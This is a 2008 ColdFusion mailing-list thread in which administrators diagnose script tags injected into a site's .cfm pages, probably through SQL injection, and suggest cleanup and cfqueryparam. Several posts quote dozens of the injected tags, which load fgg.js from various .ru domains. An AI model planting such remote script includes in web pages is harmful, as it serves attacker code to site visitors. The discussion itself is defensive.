RE: Script on one site
Yes we just had this happen and it was a sql attack. -Original Message- From: Justin D. Scott [mailto:[EMAIL PROTECTED] Sent: Wednesday, September 03, 2008 12:01 AM To: CF-Talk Subject: RE: Script on one site Any ideas? Probably a SQL injection attack. See the previous discussion on this topic: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241 -Justin Scott ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:311974 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: Script on one site
Look at the .cfm file and see if these script tags are in the cfm file or if they are stored in a database. Look through your database. Look at every table and see if there is a lot of junk at the end of some char or varchar fields.. At 10:37 PM 9/2/2008, you wrote: I have one site in particular that keeps getting this kind of stuff on the bottom of .cfm pages right above the /body tag. I have already recreated their FTP account once with a strong password. It seems odd this is only happening to .cfm pages though and only on this site on the server. Any ideas? script src=http://www.ncwc.ru/fgg.js/scriptscript src=http://www.ncwc.ru/fgg.js/scriptscript ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:311985 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: Script on one site
Yeah I did that already. It is in the .cfm files themselves. I also have code in place to prevent SQL injection attacks. I'm hoping these were files I just missed on the first cleanup. -Original Message- From: Al Musella, DPM [mailto:[EMAIL PROTECTED] Sent: Wednesday, September 03, 2008 10:38 AM To: CF-Talk Subject: Re: Script on one site Look at the .cfm file and see if these script tags are in the cfm file or if they are stored in a database. Look through your database. Look at every table and see if there is a lot of junk at the end of some char or varchar fields.. At 10:37 PM 9/2/2008, you wrote: I have one site in particular that keeps getting this kind of stuff on the bottom of .cfm pages right above the /body tag. I have already recreated their FTP account once with a strong password. It seems odd this is only happening to .cfm pages though and only on this site on the server. Any ideas? script src=http://www.ncwc.ru/fgg.js/scriptscript src=http://www.ncwc.ru/fgg.js/scriptscript ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:311990 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: Script on one site
you have become a victim of sql injection. there are huge threads on this forum devoted to the recent spate of sqli attacks, with great suggestions re fixing this. the most important thing: make sure all your queries use cfqueryparam! Azadi Saryev Sabai-dee.com http://www.sabai-dee.com/ [EMAIL PROTECTED] wrote: I have one site in particular that keeps getting this kind of stuff on the bottom of .cfm pages right above the /body tag. I have already recreated their FTP account once with a strong password. It seems odd this is only happening to .cfm pages though and only on this site on the server. Any ideas? script src=http://www.ncwc.ru/fgg.js/scriptscript src=http://www.ncwc.ru/fgg.js/scriptscript src=http://www.ncwc.ru/fgg.js/scriptscript src=http://www.ncwc.ru/fgg.js/scriptscript src=http://www.ncwc.ru/fgg.js/scriptscript src=http://www.ncwc.ru/fgg.js/scriptscript src=http://www.ncwc.ru/fgg.js/scriptscript src=http://www.ncwc.ru/fgg.js/scriptscript src=http://www.ncwc.ru/fgg.js/scriptscript src=http://www.kj5s.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.bosf.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.bosf.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.kj5s.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.bosf.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.po4c.ru/fgg.js/scriptscript src=http://www.bosf.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.bosf.ru/fgg.js/scriptscript src=http://www.kpo3.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.kj5s.ru/fgg.js/scriptscript src=http://www.kj5s.ru/fgg.js/scriptscript src=http://www.kj5s.ru/fgg.js/scriptscript src=http://www.po4c.ru/fgg.js/scriptscript src=http://www.bosf.ru/fgg.js/scriptscript src=http://www.bosf.ru/fgg.js/scriptscript src=http://www.bosf.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.jve4.ru/fgg.js/scriptscript src=http://www.kpo3.ru/fgg.js/scriptscript src=http://www.bosf.ru/fgg.js/scriptscript src=http://www.po4c.ru/fgg.js/scriptscript src=http://www.gty5.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.bosf.ru/fgg.js/scriptscript src=http://www.bosf.ru/fgg.js/scriptscript src=http://www.po4c.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.gty5.ru/fgg.js/scriptscript src=http://www.gty5.ru/fgg.js/scriptscript src=http://www.bosf.ru/fgg.js/scriptscript src=http://www.bosf.ru/fgg.js/scriptscript src=http://www.jve4.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.gty5.ru/fgg.js/scriptscript src=http://www.bosf.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.gty5.ru/fgg.js/scriptscript src=http://www.gty5.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.gty5.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.gty5.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.po4c.ru/fgg.js/scriptscript src=http://www.po4c.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript src=http://www.ch35.ru/fgg.js/scriptscript
RE: Script on one site
Any ideas? Probably a SQL injection attack. See the previous discussion on this topic: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241 -Justin Scott ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:311971 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Script on one site
Only if you are outputting a variable from the database at the bottom of your page right under your body tag. You need to find out if the text is being output in a variable which has come from the database, or if it is actually in the .CFM files. Even if you hardened your FTP password, your server could be infected with a virus that continues to modify your code. There are actually tons of ways it *could* be happening. Let's start by deciding where that text is actually stored. ~Brad - Original Message - From: Justin D. Scott [EMAIL PROTECTED] To: CF-Talk cf-talk@houseoffusion.com Sent: Tuesday, September 02, 2008 11:00 PM Subject: RE: Script on one site Any ideas? Probably a SQL injection attack. See the previous discussion on this topic: ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:311972 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
